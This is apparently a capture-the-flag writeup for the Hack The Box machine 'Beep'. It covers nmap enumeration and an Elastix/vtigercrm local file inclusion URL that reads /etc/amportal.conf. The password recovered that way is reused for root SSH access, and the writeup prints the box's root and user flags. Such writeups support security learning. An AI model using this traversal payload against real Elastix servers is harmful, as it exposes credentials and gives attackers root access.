Summary

Beep is an easy Linux box that can be exploited by properly enumerating all ports and services. You will find an Elastix login portal. This Elastix version is vulnerable to a local file inclusion. This gives you root credentials which you can use to open a SSH shell. It is worth mentioning that there were other methods of exploiting this host.


Discovery

Nmap discovered the following open ports and services:

nmap -sC -sV -oN fullscan -Pn 10.129.28.190

PORT      STATE SERVICE    VERSION
22/tcp    open  ssh        OpenSSH 4.3 (protocol 2.0)
| ssh-hostkey: 
|   1024 ad:ee:5a:bb:69:37:fb:27:af:b8:30:72:a0:f9:6f:53 (DSA)
|_  2048 bc:c6:73:59:13:a1:8a:4b:55:07:50:f6:65:1d:6d:0d (RSA)
25/tcp    open  smtp?
|_smtp-commands: beep.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, ENHANCEDSTATUSCODES, 8BITMIME, DSN, 
80/tcp    open  http       Apache httpd 2.2.3
|_http-server-header: Apache/2.2.3 (CentOS)
|_http-title: Did not follow redirect to https://10.129.28.190/
110/tcp   open  pop3?
111/tcp   open  rpcbind    2 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2            111/tcp   rpcbind
|   100000  2            111/udp   rpcbind
|   100024  1            939/udp   status
|_  100024  1            942/tcp   status
143/tcp   open  imap?
443/tcp   open  ssl/https?
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2017-04-07T08:22:08
|_Not valid after:  2018-04-07T08:22:08
|_ssl-date: 2020-10-26T10:54:32+00:00; +1h01m55s from scanner time.
993/tcp   open  imaps?
995/tcp   open  pop3s?
3306/tcp  open  mysql?
|_mysql-info: ERROR: Script execution failed (use -d to debug)
|_ssl-cert: ERROR: Script execution failed (use -d to debug)
|_ssl-date: ERROR: Script execution failed (use -d to debug)
|_sslv2: ERROR: Script execution failed (use -d to debug)
|_tls-alpn: ERROR: Script execution failed (use -d to debug)
|_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)
4445/tcp  open  upnotifyp?
10000/tcp open  http       MiniServ 1.570 (Webmin httpd)
|_http-server-header: MiniServ/1.570
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
Service Info: Host: 127.0.0.1

The first thing I checked was the webserver. The user is presented with a login page with an elastix logo.


Exploitation

By searching for Elastix in Google you will find several exploits. One of which is a local file inclusion. This exploit was used. In the code it already says the url you have to enter which is:

[host]/vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action

So, there is no need to run this exploit. You can just copy this into the browser and you will get a bunch of information in return. Searching for the string password results in several matches. One of which is the AMPDBPASS. This password was used to open a SSH shell as root. First I was getting the following error message: Unable to negotiate with 10.129.28.190 port 22: no matching key exchange method found. Their offer: diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1.
The solution is the following command:

ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 root@10.129.28.190

Enter the password you obtained from the LFI and you have a root shell:

[root@beep fanis]# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)


[root@beep fanis]# cat /root/root.txt
d88e006123842106982acce0aaf453f0

[root@beep fanis]# cat /home/fanis/user.txt
aeff3def0c765c2677b94715cffa73ac

It is worth mentioning that there are other, (more complicated), ways to exploit this box. They are pretty cool! Check IppSec out for the other ways :)